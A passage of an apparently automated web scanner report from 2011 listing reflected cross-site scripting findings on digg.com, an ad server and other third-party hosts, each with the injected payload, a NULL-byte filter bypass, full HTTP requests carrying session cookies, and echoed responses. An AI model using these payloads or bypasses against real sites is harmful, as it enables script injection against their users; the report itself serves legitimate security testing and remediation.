<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language='javascript'>var theform = document.forms[0];theform.action = '/index.aspx?puid=DDB9EA26-95E8-4243-A47C-5AA8728ABE46&72398';alert(1)//453a224832a=1';</script>
...[SNIP]...

4.103. http://digg.com/ajax/tooltip/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/tooltip/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003d472"><script>alert(1)</script>dd8bfeb6e79 was submitted in the REST URL parameter 1. This input was echoed as 3d472"><script>alert(1)</script>dd8bfeb6e79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%003d472"><script>alert(1)</script>dd8bfeb6e79/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=696877 10.2.130.24
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18423

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax%003d472"><script>alert(1)</script>dd8bfeb6e79/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2.rss">
...[SNIP]...

4.104. http://digg.com/ajax/tooltip/submit [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/tooltip/submit

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003f18c"><script>alert(1)</script>987b09908e7 was submitted in the REST URL parameter 2. This input was echoed as 3f18c"><script>alert(1)</script>987b09908e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/tooltip%003f18c"><script>alert(1)</script>987b09908e7/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=421321 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18431

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/tooltip%003f18c"><script>alert(1)</script>987b09908e7/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2.rss">
...[SNIP]...

4.105. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c7d7a"><script>alert(1)</script>f1be7ad2499 was submitted in the REST URL parameter 1. This input was echoed as c7d7a"><script>alert(1)</script>f1be7ad2499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00c7d7a"><script>alert(1)</script>f1be7ad2499?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=708118 10.2.129.49
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18628

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00c7d7a"><script>alert(1)</script>f1be7ad2499?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems.rss">
...[SNIP]...

4.106. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95946'%3balert(1)//6711be401d1 was submitted in the redir parameter. This input was echoed as 95946';alert(1)//6711be401d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F95946'%3balert(1)//6711be401d1 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb865736=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII1LEDEAoYAiACKAIw1NqX8QQQ1NqX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb887655=5_[r^XI()v4FMSZKU:cHSV7Bm?enc=-FJ40Oy69z_ffZ-7blv1PwAAAEAzMwtA332fu25b9T_4UnjQ7Lr3PwIbxuWVHrQBOHCoZussF2RU7SVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAzw8BAgUCAQUAAAAANiXwrwAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108436%29%3Buf%28%27r%27%2C+510110%2C+1311108436%29%3Bppv%2815053%2C+%27122756718999771906%27%2C+1311108436%2C+1316292436%2C+98060%2C+76813%29%3B&cnd=!niawKQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAJ4BIABAogBBJABAZgBAaABAagBA7ABALkBiKm88Oy69z_BAYipvPDsuvc_yQG0jpyV-OrbP9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`Nuw(8=Lnb-ndK:'oSJZT8lllP')@cvPhg!7gtG3TDqleDjk<On>r#%Ncs!)NZ^B/Cy2)G90+:usmpN$w86RUq5cwb?6Z'a; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:47:16 GMT
Content-Length: 414

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.120-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=120;dc=w;btg=bz.25;ord=1311108273?95946';alert(1)//6711be401d1">
...[SNIP]...

4.107. http://image.providesupport.com/cmd/versionone [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/versionone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bea88<script>alert(1)</script>40eaaf49c7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmdbea88<script>alert(1)</script>40eaaf49c7e/versionone?ps_t=1311085407790&ps_l=http%3A//www.versionone.com/Product/&ps_r=http%3A//pm.versionone.com/AgilePoster.html%3Fc-aws%3Daps%26gr-apss%26v-010%26gclid%3DCNf6xcPNjaoCFcTe4AodVQ6rzQ&ps_s=md4i0utLDDtg HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.versionone.com/Product/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=md4i0utLDDtg

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Tue, 19 Jul 2011 14:23:21 GMT
Content-Length: 579

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmdbea88<script>alert(1)</script>40eaaf49c7e/versionone?ps_t=1311085407790&ps_l=http://www.versionone.com/Product/&ps_r=http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ&ps_s=md4i0utLDDtg
</pre>
...[SNIP]...

4.108. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 405ea<script>alert(1)</script>c1eda980f6d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=C07583405ea<script>alert(1)</script>c1eda980f6d&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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